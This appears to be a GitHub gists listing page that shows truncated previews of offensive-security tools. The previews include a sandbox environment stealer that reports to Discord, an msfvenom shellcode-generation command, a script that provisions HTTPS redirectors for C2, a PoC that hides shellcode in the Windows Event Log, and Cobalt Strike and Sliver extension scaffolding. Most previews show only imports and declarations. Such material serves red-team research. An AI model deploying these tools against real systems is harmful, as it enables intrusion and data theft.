benheise / sandbox-env-stealer.py
Created February 16, 2022 14:45 — forked from Albocoder/sandbox-env-stealer.py
Python code used to collect environment data from inside sandboxes and send it to a Discord server (the collection/exfiltration routine itself is not shown in this preview).
#################################################################################
#                                                                               #
#  Refer to this blog post about what this code is used for:                    #
#  https://albocoder.github.io/malware/2021/06/01/SandboxStudy.html             #
#                                                                               #
#################################################################################
import requests
import os
import psutil
#include <windows.h>
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char **argv){
//msfvenom -p windows/exec cmd=calc.exe EXITFUNC=thread -f c -v shellcode
benheise / Automated-Redirectors.py
Created February 21, 2022 23:08 — forked from mhaskar/Automated-Redirectors.py
Python script to create HTTPS redirectors that point to your C2 (the provisioning logic is not shown in this preview).
#!/usr/bin/python
import requests
import json
import time
import paramiko
# NOTE(review): the `Crypto` namespace is provided by both the long-unmaintained
# PyCrypto and its drop-in successor PyCryptodome; nothing here pins which one is
# expected. Confirm the intended package (and that it is current) before deploying.
from Crypto.PublicKey import RSA
from os import chmod
# Filename the script presumably writes RSA key material to — the code that uses
# it is outside this preview. Despite the `.key` suffix the variable is named
# "public_key_name"; verify which half of the key pair lands in this file and
# that the `chmod` imported above restricts its permissions if it is private.
public_key_name = "test1.key"
benheise / EventLogInject.cs
Created May 9, 2022 17:56
PoC to write shellcode into, and read it back out of, the Windows Event Log (only the `using` directives and namespace header are shown in this preview).
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace HiddenEventLogs
{
#define _WIN32_WINNT 0x0502
#define WINVER 0x0502
#include <windows.h>
#include <errhandlingapi.h>
#include <process.h>
#include "beacon.h"
// Forward declarations in the `MODULE$symbol` form used with `beacon.h`
// (included above) — presumably the Cobalt Strike BOF dynamic-function-resolution
// convention, where the loader binds each name to the export of the named DLL
// instead of the import table. Confirm against the BOF loader in use.
WINBASEAPI PVOID WINAPI KERNEL32$AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler);
// Thread creation/exit go through the CRT (`_beginthreadex`/`_endthreadex`)
// rather than CreateThread; the code that calls them is outside this preview.
DECLSPEC_IMPORT uintptr_t __cdecl MSVCRT$_beginthreadex(void *_Security,unsigned _StackSize,_beginthreadex_proc_type _StartAddress,void *_ArgList,unsigned _InitFlag,unsigned *_ThrdAddr);
DECLSPEC_IMPORT void __cdecl MSVCRT$_endthreadex(unsigned _Retval);
benheise / gist:b4d0c25f5c557a9cabea99006ffba2aa
Created February 16, 2023 16:55 — forked from freefirex/gist:dec308e1d95c6ea090c61d31a4db6f89
VS Code user snippet for scaffolding a Sliver COFF extension manifest.
{
"SliverExtension" :{
"prefix": "sliverext",
"body": [ "{",
"\"name\": \"$1\",",
"\"version\": \"0.0.0\",",
"\"command_name\": \"$2\",",
"\"extension_author\": \"$3\",",
"\"original_author\": \"$3\",",
"\"repo_url\": \"N/A\",",